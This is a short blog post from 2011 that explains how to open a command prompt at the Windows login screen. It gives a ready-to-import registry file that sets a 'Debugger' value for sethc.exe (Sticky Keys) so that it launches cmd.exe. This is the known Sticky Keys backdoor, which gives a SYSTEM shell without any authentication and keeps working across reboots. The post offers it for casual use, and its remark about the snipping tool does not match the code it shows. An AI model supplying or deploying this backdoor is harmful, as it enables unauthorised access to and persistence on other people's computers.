Tuesday, June 7, 2011

How to get command line before login into windows? Sounds Interesting no?

You can redirect sethc.exe to run the snipping tool by using the debugger trick in Windows, import the code below into your registry :

Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
@=""
"Debugger"="C:\\Windows\\System32\\cmd.exe"

Enjoy!!!

No comments:

Post a Comment